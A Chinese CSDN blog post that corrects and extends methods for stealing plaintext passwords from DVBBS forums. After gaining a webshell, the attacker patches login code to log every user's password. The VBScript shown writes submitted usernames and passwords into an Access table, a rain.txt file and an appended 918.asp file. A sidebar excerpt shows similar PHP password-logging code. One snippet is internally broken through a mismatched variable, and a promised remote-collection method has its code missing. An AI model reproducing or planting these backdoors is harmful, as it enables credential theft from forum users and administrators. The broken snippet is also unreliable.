关于"截取动网BBS的用户密码"一文的校正

最新推荐文章于 2021-02-25 08:12:18 发布
最新推荐文章于 2021-02-25 08:12:18 发布
阅读量908 收藏
点赞数
分类专栏: 脚本编程 文章标签: bbs microsoft function insert access user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenitx/article/details/360719
版权

原文说:要在它验证的前面得到它的密码,所以,我在Function Dvbbs_ChkLogin
后面加上Code:
dim dbpath,rstmp,str,rs,con
   set con=server.createobject("adodb.connection")
   DBPath = Server.MapPath("example.mdb")
   con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
  
  
  
   set rstmp=server.createobject("adodb.recordset")
  
   username = Request.form("username")
   password = Request.form("password")
  
   str="insert Into User (username,password) v alues('"& username &"','"& password &"')"
   con.execute(str)

这句话说得不是太明白,我经过测试发现应该是在
Function Dvbbs_ChkLogin
。。。
End Function中间插入上面的代码,但是上面的代码写得不规范,调试时总是出错,最明显的“v alues”也写分开了。
我把代码调整了一下,如下:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("bbs.mdb")
con.Open "driver={Microsoft Access Driver (*.mdb)};dbq="&DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) values('"&username&"','"&password&"')"
con.execute(str)




写一个关于TXT的吧!!今天在918X哪里看到 下文:
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

新办法:

方法一:login.asp中Case "chk"下:
   on error resume next
   dim rain
   set lP=server.CreateObject("Adodb.Stream")
   rain.Open
   rain.Type=2
   rain.CharSet="gb2312"
   rain.LoadFromFile server.mapPath("918.asp")
   rain.Position=lp.Size
   rain.writetext now&request("username")&"text:"&request("password")&chr(10)
   rain.SaveToFile server.mapPath("918.asp"),2
   rain.Close
   set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:


  在login.asp那里插入一句: response.write "" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高

chenitx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql中循环截取用户信息并插入到目标表对应的字段中
09-10
将各个用户对应的属性插入到目标表对应的字段中,last_update为数据更新日期
Oracle中字符串截取最全方法总结
热门推荐
真正的大师,永远怀着一颗学徒的❤
08-30 40万+
substr 函数:截取字符串 语法:SUBSTR(string,start,[length]) string:表示源字符串,即要截取的字符串。 start:开始位置,从1开始查找。如果start是负数,则从string字符串末尾开始算起。 length:可选项,表示截取字符串长度。 示例: SELECT SUBSTR('Hello SQL!', 1) FROM dual .........
java 文件地址截取文件名_关于Java文件名的截取方法
weixin_42131633的博客
02-25 3138
在实际开发应用中会应到截取文件名,那么今天爱站技术频道的小编就給您带来这篇关于Java文件名的截取方法,希望能给大家帮上忙,下面来一起看看吧。1.截取不带后缀的文件名String resourceName=resourceSearchBean.getFileName();if(StringHelper.isNotEmpty(resourceName)&&resourceName.l...
PotPlayer 无损截取视频片段
既然选择了远方 便只顾风雨兼程 - 永强
03-29 4万+
PotPlayer 无损截取视频片段
支付宝吱口令的截取
pzhu_lcx的博客
12-27 1万+
最近支付宝扫码领红包,复制邀请码领红包的活动开展得如火如荼,期间层出不迭一些套路,将自己的支付宝邀请码混杂在一段有趣的文字中,让用户打开支付宝,以此获得奖金,比如这样式的:受朋友之托征婚 女,唐紫,26岁,未婚,上海本地人,身高1米65,体重48公斤,复旦大学毕业。漂亮大方,爱好旅游,健身美体,游泳。目前在上海张江一家中国500强公司任职,工作稳定,年薪50万。上海有2套房,1套在汤臣豪园,一辆特斯
常用的字符串截取方法
xinyuezitang的博客
03-27 26万+
1 取字符串的前i个字符 str=str.substring(0,i); str=str.remove(i,str.Length-i); 2 去掉字符串的前i个字符: str=str.remove(0,i); str=str.substring(i); 3 从右边开始取i个字符: str=str.substring(str.Length-i); str=str.remove(0,str.Lengt...
移动端用户头像上传截取修改实现.rar
02-17
移动端用户头像上传截取修改实现,通过用户上传头像或者拍照选择,截取头像选择部分,保存上传即可,直接拿来就可以使用,代码简单。
关于中gridview 字符串截取的方法
10-27
在Gridview中,如果你的某一列字符串的长度过长,不做处理的话.那么将显示的奇丑无比,可以采取设置样式,将其显示为定长,可以在点击查看的时候,在另一个页面对其进行显示
php截取后台登陆密码的代码
12-19
if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_...–passwd:.$_POST[password]....–.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb fwrite(fopen(robot.txt,ab),$sb);... 我只
目前最快的分页..十万数据也在10~20Ms
雷纳德的专栏
04-24 2402
在我们做网站开发,都采用 Asp,PHP,Jsp 等等的语言编写,而Asp更是大家的至爱,因为它开发简便,运用灵活。在编写Asp的同时,也有不少朋友为了分页的效率头痛。如果是小型的应用,比如数据表中的记录预计在几千条以内的,我们可以用自带的分页,而不用去考虑太多效率的问题。但如果应用是在上万甚至几十万,上千万的数据量,自带的分页就显得力不从心了,因为它把所有的记录都读取了出来,数据越多越慢。所以我
用CSS美化你的网页
雷纳德的专栏
05-28 1406
现在我们设计网页已经离不开CSS,使用CSS可以美化我们的网页,这已经是大家所共知的了!   CSS是“Cascading Style Sheets”的缩写,译为样式表。HTML允许我们利用CSS来实现风格的显示,举个简单的例子:我们可以使用标签来使页面的字体加粗。如:  网页教学网加粗字体显示  如果你使我们使字体显示为红色、宋体、并且加粗显示我们可以使用下面的代码:  网页教学网字体演示  这
基于ACCESS数据库的纯asp论坛制作心得
雷纳德的专栏
04-24 1075
日期:2001-3-7 15:28:00出处:chinaasp.com 作者:seal   感觉做一个论坛不像想象中的那么容易,但也不像想象中的那么复杂:),经过4天的浴血奋战,终于从对论坛制作一无所知到今天的论坛数据结构和组织形势初步确定,中间参考了sunamd,bigeagled,廖家远等的思路,并得到了赖皮王子,hooke,bigeagle大虾的热心帮助,谨以此文一并表示感谢。    big
制作1px边框表格的几种方法
雷纳德的专栏
05-28 1056
有过网页制作经验的朋友一定知道:一般来讲,把表格的边框定义为1px时,即border=1,而实际上是2px。而我们在很多时候需要那种真正的边框为1px的表格,下面就介绍几种方法。   一、用嵌套表格   用两个表格嵌套,外层的表格的长与宽比里层的多出2px,并设置对齐属性为水平居中、垂直居中,然后把外层表格的背景设为你需要的边框颜色,里层表格背景设为与网页背景相同,这样就实现我们的愿望了,实例如下
ASP如何使用MYSQL数据库
雷纳德的专栏
04-24 986
日期:2001-7-4 23:30:00出处:aspcn 作者:糊锅巴MYSQL数据库以它短小、方便、速度快、免费等优点成为很多网站目前首选数据库,但一般都是用PHP+MYSQL相结合来开发各种动态页面,其实ASP也可以使用MYSQL数据库开发动态页面,小弟我也是刚刚学会,不敢独享,所以特写了这篇文章供大伙参考。   我的环境是WINDOWS98+PWS4.0+mysql-3.23.32-win+
数据库分页算法类 仿LeadBBS
雷纳德的专栏
04-24 948
Class Pg_Jet_Ex      Private sCodeVer, sCodeName, sCoder, sDis      Private Toward, Backward, TowardOrder, BackwardOrder      Private IdxSql, QuerySql      Public Conn      Public PageCount, ItemCount
提高页面显示速度的秘技
雷纳德的专栏
05-28 859
在安排Web页面的布局时,最常用的方法之一是用HTML表格界定页面的结构。例如,假设Web页面由顶端的导航条和它下面的两栏(列)构成——左边的列是一个导航条,右边的列是实际安置内容的区域。对于这样一个页面,我们可以用一个两行、两列的大表格进行布局:在第一行中,合并两个列然后放上顶端导航表格;在第二个行中,左边的列放上一个显示导航按钮的表格,右边的列再用一个表格显示页面的实际内容。用这种表格嵌套表格
SQL Server 中易混淆的数据类型
雷纳德的专栏
04-24 842
(1)char、varchar、text和nchar、nvarchar、ntextchar和varchar的长度都在1到8000之间,它们的区别在于char是定长字符数据,而varchar是变长字符数据。所谓定长就是长度固定的,当输入的数据长度没有达到指定的长度时将自动以英文空格在其后面填充,使长度达到相应的长度;而变长字符数据则不会以空格填充。text存储可变长度的非Unicode数据,最大长度
ASP中Split函数的实例
雷纳德的专栏
04-24 840
大家有碰到过要想取一字符串里的某些值而无从下手?有没有觉得看书或教材对split的写法糊里糊涂……如果有此疑问的话,请看下面我对例子的解释,相信您会对这个有一定的了解。   我先介绍一下Split函数的用法:返回值数组 = Split("字符串","分割符")  假设变量strURL保存着URL值,如strURL = "ftp://username:password@server",这是我们在IE
Python如何只截取手机用户每一次操作的截图
最新发布
06-08
截取手机用户每一次操作的截图,你可以使用Python的第三方库`uiautomator`。这个库提供了一些API可以用于控制Android设备,包括截图功能。 以下是基本的代码示例,可以实现在连接的Android设备上截取屏幕截图: ```python import uiautomator2 as u2 # 连接设备 d = u2.connect() # 截取屏幕截图 screenshot = d.screenshot() # 保存屏幕截图 screenshot.save("screenshot.png") ``` 如果你想截取用户操作的截图,可以在用户操作之前和之后分别调用上面的代码,获取两张屏幕截图,然后比较两张截图的差异,来确定用户操作的区域和内容。你可以使用Python的图像处理库,如`Pillow`来处理屏幕截图。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值